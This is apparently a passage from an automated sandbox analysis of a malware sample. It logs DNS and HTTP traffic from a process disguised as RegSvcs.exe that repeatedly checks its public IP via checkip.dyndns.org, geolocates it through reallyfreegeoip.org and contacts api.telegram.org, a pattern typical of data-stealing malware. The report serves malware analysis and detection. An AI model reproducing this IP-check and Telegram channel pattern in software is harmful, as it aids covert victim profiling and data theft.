Jan 8, 2025 15:44:04.752666950 CET	49540	53	192.168.2.5	1.1.1.1
Jan 8, 2025 15:44:04.759500027 CET	53	49540	1.1.1.1	192.168.2.5
Jan 8, 2025 15:44:05.746161938 CET	51277	53	192.168.2.5	1.1.1.1
Jan 8, 2025 15:44:05.754116058 CET	53	51277	1.1.1.1	192.168.2.5
Jan 8, 2025 15:44:16.625680923 CET	60738	53	192.168.2.5	1.1.1.1
Jan 8, 2025 15:44:16.632550955 CET	53	60738	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 8, 2025 15:44:04.752666950 CET	192.168.2.5	1.1.1.1	0x6aa5	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 8, 2025 15:44:05.746161938 CET	192.168.2.5	1.1.1.1	0x1a7b	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 8, 2025 15:44:16.625680923 CET	192.168.2.5	1.1.1.1	0xe99b	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 8, 2025 15:44:04.759500027 CET	1.1.1.1	192.168.2.5	0x6aa5	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 8, 2025 15:44:04.759500027 CET	1.1.1.1	192.168.2.5	0x6aa5	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 8, 2025 15:44:04.759500027 CET	1.1.1.1	192.168.2.5	0x6aa5	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 8, 2025 15:44:04.759500027 CET	1.1.1.1	192.168.2.5	0x6aa5	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 8, 2025 15:44:04.759500027 CET	1.1.1.1	192.168.2.5	0x6aa5	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 8, 2025 15:44:04.759500027 CET	1.1.1.1	192.168.2.5	0x6aa5	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 8, 2025 15:44:05.754116058 CET	1.1.1.1	192.168.2.5	0x1a7b	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Jan 8, 2025 15:44:05.754116058 CET	1.1.1.1	192.168.2.5	0x1a7b	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Jan 8, 2025 15:44:16.632550955 CET	1.1.1.1	192.168.2.5	0xe99b	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	132.226.247.73	80	4612	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 15:44:04.770581961 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 8, 2025 15:44:05.471961975 CET	273	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 14:44:05 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 8, 2025 15:44:05.476053953 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 8, 2025 15:44:05.693861008 CET	273	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 14:44:05 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 8, 2025 15:44:06.450648069 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 8, 2025 15:44:06.668267965 CET	273	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 14:44:06 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49707	132.226.247.73	80	4612	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 15:44:07.345136881 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 8, 2025 15:44:08.017226934 CET	273	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 14:44:07 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49709	132.226.247.73	80	4612	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 15:44:08.791681051 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 8, 2025 15:44:09.412719965 CET	273	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 14:44:09 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49711	132.226.247.73	80	4612	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 15:44:10.034434080 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 8, 2025 15:44:10.725920916 CET	273	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 14:44:10 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49713	132.226.247.73	80	4612	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 15:44:11.382435083 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 8, 2025 15:44:12.051609039 CET	273	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 14:44:11 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49715	132.226.247.73	80	4612	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 15:44:12.687886953 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 8, 2025 15:44:13.367024899 CET	273	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 14:44:13 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49717	132.226.247.73	80	4612	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 15:44:13.969070911 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 8, 2025 15:44:14.652435064 CET	273	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 14:44:14 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49720	132.226.247.73	80	4612	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 15:44:15.301491022 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 8, 2025 15:44:15.983721972 CET	273	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 14:44:15 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49754	132.226.247.73	80	5488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 15:44:21.344120026 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 8, 2025 15:44:22.028577089 CET	273	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 14:44:21 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 8, 2025 15:44:22.032052040 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 8, 2025 15:44:22.242522001 CET	273	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 14:44:22 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 8, 2025 15:44:23.190187931 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 8, 2025 15:44:23.401701927 CET	273	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 14:44:23 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49772	132.226.247.73	80	5488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 15:44:24.036158085 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 8, 2025 15:44:24.706125021 CET	273	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 14:44:24 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49783	132.226.247.73	80	5488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 15:44:25.394895077 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 8, 2025 15:44:26.121742010 CET	273	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 14:44:26 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49795	132.226.247.73	80	5488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 15:44:26.757416010 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 8, 2025 15:44:27.431449890 CET	273	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 14:44:27 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49807	132.226.247.73	80	5488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 15:44:28.086678028 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 8, 2025 15:44:28.776391983 CET	273	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 14:44:28 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49815	132.226.247.73	80	5488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 15:44:29.399910927 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 8, 2025 15:44:30.089771032 CET	273	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 14:44:29 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49825	132.226.247.73	80	5488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 15:44:30.704711914 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 8, 2025 15:44:31.375387907 CET	273	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 14:44:31 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49834	132.226.247.73	80	5488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 15:44:31.995208979 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 8, 2025 15:44:32.812037945 CET	273	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 14:44:32 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	188.114.96.3	443	4612	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 14:44:06 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-08 14:44:06 UTC	858	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 14:44:06 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1662235 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OhiYth%2Bc8YE%2FwMy5DmNRgmJ4xX0uYQQ8ZdC1N3Yr1le0A5jWt1hG%2BEPZu0bYxdRdBjjM00N7OKYWxzLAaTMDo3ErySGeqbATagSwdMhIO%2F2P5jjdKhkSv6%2BzkJlyAGMoDxPtAxZ0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fecf6b3d8f84301-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1622&min_rtt=1614&rtt_var=621&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1739130&cwnd=32&unsent_bytes=0&cid=fd71e0c0d6416317&ts=215&x=0"
